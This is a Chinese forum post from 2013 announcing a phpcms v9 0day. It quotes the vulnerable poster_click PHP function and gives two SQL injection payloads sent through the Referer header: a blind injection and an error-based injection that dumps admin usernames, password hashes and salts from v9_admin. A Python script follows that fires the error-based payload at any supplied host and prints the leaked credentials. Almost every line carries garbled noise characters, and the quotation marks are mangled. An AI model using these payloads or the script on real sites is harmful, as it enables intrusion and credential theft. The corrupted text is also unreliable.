有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:8 F3 e' I: V. [9 |' J
8 \ K: y k% e5 ^2 r9 l! P
问题函数\phpcms\modules\poster\index.php
* L7 f$ N* J& _" u& v5 T6 i* ~7 x m) W' T" u4 c9 I
public function poster_click() {* }" h! x/ m( F0 n: s
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;1 O/ c/ u6 `8 i! v* c
$r = $this->db->get_one(array('id'=>$id));
9 P4 Q4 f& n1 M& C& @8 Y! vif (!is_array($r) && empty($r)) return false;% N# b w- J3 g4 w
$ip_area = pc_base::load_sys_class('ip_area');0 m6 q& z4 Q" T! R! l9 o
$ip = ip();
9 v7 O. o$ a+ F& e- s, m$area = $ip_area->get($ip);. g, Y0 h( G' B5 T" B( ^9 Y6 i6 |
$username = param::get_cookie('username') ? param::get_cookie('username') : '';# O# K1 o- z' y7 R
if($id) {% {4 |8 T9 F8 J' p' J/ G
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
- ?' j1 e; r& T! e3 H$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));) U4 w; y7 l( I. t& y
}# |5 Z- A ~0 p6 O, y1 |: b$ X
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));- Z) G- r- a4 d5 u5 C
$setting = string2array($r['setting']);. C+ t4 V1 N" g- M$ |! ~; ^
if (count($setting)==1) {8 y% r. ~4 ~4 h4 u. P. V- X) k
$url = $setting['1']['linkurl'];. l. Q" |% F( o, l0 K" r6 d
} else {4 n# B4 G% N, v2 T' n
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];3 N. C% f5 |0 z0 Y! o$ X
}
* u# E L |4 w8 \* M8 zheader('Location: '.$url); g: |, t( y1 x& C$ O
}
/ W6 O/ \; o( e. w
3 u, d: W5 x+ S0 T
1 B6 V9 |% W) n3 y. A( S# N& d# m! z6 s5 N5 ^8 \# N4 c
利用方式:0 p' [) c& A$ \
1 l. d7 w, r, a2 f0 Q( n$ k4 T' y
1、可以采用盲注入的手法:# J# D' ~& W; b) B2 K
3 V( Y! T/ D0 {, Rreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#6 k& C/ d& V7 S( x! e1 N
# P7 p- S" H; L通过返回页面,正常与否一个个猜解密码字段。8 ?) R3 C; i9 k k9 u
Y4 j. `5 _8 o) |7 S2 e0 k% A
2、代码是花开写的,随手附上了:1 k! g3 X- k( b( j( n/ d3 }0 J
9 ^+ N' X1 N8 q; G0 `3 I1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
& @- R# [1 A$ k7 ~- F/ {0 Z4 s
& M& U5 @7 E1 X, r& \+ d+ B此方法是爆错注入手法,原理自查。& f3 {' k5 p8 U9 X% X3 M' h* _
! Y8 u( o% r$ `9 _0 ^
. D1 @3 {' t6 c3 o
& c7 U& k$ X0 K2 p3 H3 J. e1 t利用程序:5 j/ V8 T7 G4 ?+ t0 [+ o
7 e8 Y, _! t5 G. [#!/usr/bin/env python
0 \; O5 f/ G# W: k2 M$ G( @import httplib,sys,re
$ Q! U( i1 i$ n! n7 U! g0 k% b3 n
def attack():
+ x7 K1 _; |) b! jprint “Code by Pax.Mac Team conqu3r!”+ }: w5 A. B0 U0 \3 ]# k" y* `1 E
print “Welcome to our zone!!!”
% U- y# }9 J3 R4 X8 Q7 d9 n. v& G0 kurl=sys.argv[1]
5 v3 k- C: }7 C$ `; w0 Spaths=sys.argv[2]; m& K7 |& m: N& `+ b. ]. g$ C
conn = httplib.HTTPConnection(url)( }( M+ @/ V1 l2 Z/ j' a: A/ d1 U+ @- K
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
% U6 a: Q- C# |/ `$ X, A+ ~“Accept”: “text/plain”,7 R7 f2 n1 x. [. Z4 J) h
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
$ x \! l9 ]' N9 T4 U, Y# T! yconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)( G2 s; ~6 J D
r1 = conn.getresponse()
, [' T6 r" u3 D; r# _datas=r1.read()2 q( P+ r6 K, U: R
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
3 \; G8 l) b6 Oprint datas[0]1 @' E8 g* e. M' K' @4 o
conn.close()
& ^# A: e3 u$ d0 xif __name__==”__main__”:2 l& J' ^& I5 P' r7 y' U
if len(sys.argv)<3:
, X3 {; ^/ R. c/ zprint “Code by Pax.Mac Team conqu3r”
& F4 A/ V1 i# o4 X+ Uprint “Usgae:”. R% T. q* a# C# x: F. \% i
print “ phpcmsattack.py www.paxmac.org /”7 F2 w% C* y) t: r6 W2 e- q+ Q
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
6 q ^8 K% L9 X, Dsys.exit(1)) D& ]3 m/ K' b: M
attack()" R8 O0 [0 m. D8 ~6 X8 G ^
4 k9 g6 y" D- e$ N; y" E v
|
发表于 2013-1-11 21:01:00
收藏
支持
反对